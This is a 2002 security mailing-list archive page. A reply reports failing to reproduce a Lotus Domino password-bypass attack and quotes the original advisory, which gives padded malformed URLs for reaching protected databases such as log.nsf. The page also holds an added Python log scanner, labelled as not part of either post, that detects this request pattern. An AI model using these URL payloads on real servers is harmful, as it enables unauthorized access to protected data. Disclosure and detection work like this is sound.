Re: Lotus Domino url bypass

From: j.mickertsat_private
Date: Mon Feb 04 2002 - 00:35:37 PST


    Hi,
    
    This does not work for me. I tested it against Domino 5.0.8 on Windows 
    2000 SP2 with all actual patches. I get redirected to the login page. How 
    are your ACLs on the template? Mine do not allow Anonymous or Default any 
    access. Maybe this corrects the issue. I also use SSL to connect, but this 
    should not interfere with the exploit. Maybe you should state version and 
    platform.
    
    Kind regards,
    
    Jens Mickerts
    
    
    
    
    
    "Gabriel A. Maggiotti" <gmaggiotat_private>
    Sent by: gabiat_private
    04.02.2002 04:30
    Please reply to gmaggiot
    
     
            To:      vuln-devat_private, bugtraqat_private
            Cc: 
            Subject: Lotus Domino url bypass
    
    
    
    ---------------------------------------------------------------------------
    Web:  http://qb0x.net                        Author: Gabriel A. Maggiotti
    Date: February 03, 2002                      E-mail: gmaggiotat_private
    ---------------------------------------------------------------------------
    
    
    General Info
    ------------
    Problem Type    :  password protected url bypass
    Product         :  Lotus Domino
    Scope           :  Remote
    Risk            :  High
    
    
    Summary
    -------
    A security vulnerability has been found in the popular Lotus Domino Web 
    server.
    Lotus Domino has files like webadmin.nsf, log.nsf and names.nsf; these 
    files are password protected. I discovered that it is possible to bypass 
    this password if you create a malformed url.
    
    Notes databases ('.nsf') like webadmin.nsf or log.nsf are stored in the 
    "lotus/domino/data/" directory, and Notes templates ('.ntf') are stored in 
    the same place (here is the goal).
    
    
    Examples:
    
    I found a critical and a maximum length.
    
    assuming the buffer is:                          http://host.com/<buff>/
    
    Critical buffer length is the minimum buffer length you need to bypass 
    the passwd file.
    
    normal url:              http://host.com/log.nsf                 <----           Request for a passwd
    modify url:              http://host.com/log.ntf<buff>.nsf/
                                             |--------- 217 --------|
    
    In the case of log.nsf, <buff> is 217 - 12 = 205 '+' and the url will be:
    
    http://host.com/log.ntf++++++++++++++++++++.nsf/
                                            |-------- 205 -----| 
    
    
    If you write a buffer between 219 and 257 (higher buffer), you bypass the 
    passwd.
    modify url:     http://host.com/log.ntf<buff>.nsf/
                                    |---219 to 257 ---|
    
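As an added example, not part of either post, the following defender-side check scans web server access logs for the request shape the advisory describes (a template name and a long filler run smuggled into a .nsf path). The log format, the thresholds and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Thresholds are illustrative assumptions, set around the 217-byte path length the advisory quotes.
MAX_SEGMENT_LEN = 200
# A template name (.ntf) followed by .nsf in one path segment: the "log.ntf<padding>.nsf" shape.
_TEMPLATE_IN_DB_SEGMENT = re.compile(r"\.ntf.*\.nsf$", re.IGNORECASE)
# 16 or more copies of one filler character (e.g. "+") in a row.
_PAD_RUN = re.compile(r"([+ .%_-])\1{15,}")
# Minimal Common Log Format parser; only client, method, URI and status are used.
_CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def inspect_path(raw_uri):
    """Return the reasons a request path looks like a malformed .nsf reference ([] if none)."""
    path = unquote(urlsplit(raw_uri).path)
    reasons = []
    for seg in path.split("/"):
        if not seg.lower().endswith(".nsf"):
            continue  # only Notes database references are of interest
        if _TEMPLATE_IN_DB_SEGMENT.search(seg):
            reasons.append("template name (.ntf) embedded in .nsf path")
        if _PAD_RUN.search(seg):
            reasons.append("long run of filler characters in database name")
        if len(seg) > MAX_SEGMENT_LEN:
            reasons.append("database path segment of %d bytes" % len(seg))
    return reasons

def scan_log(lines):
    """Return (client, uri, status, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        m = _CLF.match(line)
        if not m:
            continue
        client, _method, uri, status = m.groups()
        reasons = inspect_path(uri)
        if reasons:
            hits.append((client, uri, int(status), reasons))
    return hits

# Constructed sample access-log lines (not taken from the original posts).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Feb/2002:04:30:00 -0300] "GET /log.nsf HTTP/1.0" 401 0',
    '192.0.2.10 - - [04/Feb/2002:04:30:05 -0300] "GET /log.ntf' + "+" * 205 + '.nsf/ HTTP/1.0" 200 5120',
    '192.0.2.11 - - [04/Feb/2002:04:31:00 -0300] "GET /names.nsf?OpenDatabase HTTP/1.0" 401 0',
]

if __name__ == "__main__":
    for client, uri, status, reasons in scan_log(SAMPLE_LOG):
        print(client, status, uri[:40] + "...", "; ".join(reasons))
```

A 200 response on a flagged request is the case worth escalating; a 401 on the same shape shows the ACL held, as in the reply above.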



    This archive was generated by hypermail 2b30 : Mon Feb 04 2002 - 09:45:27 PST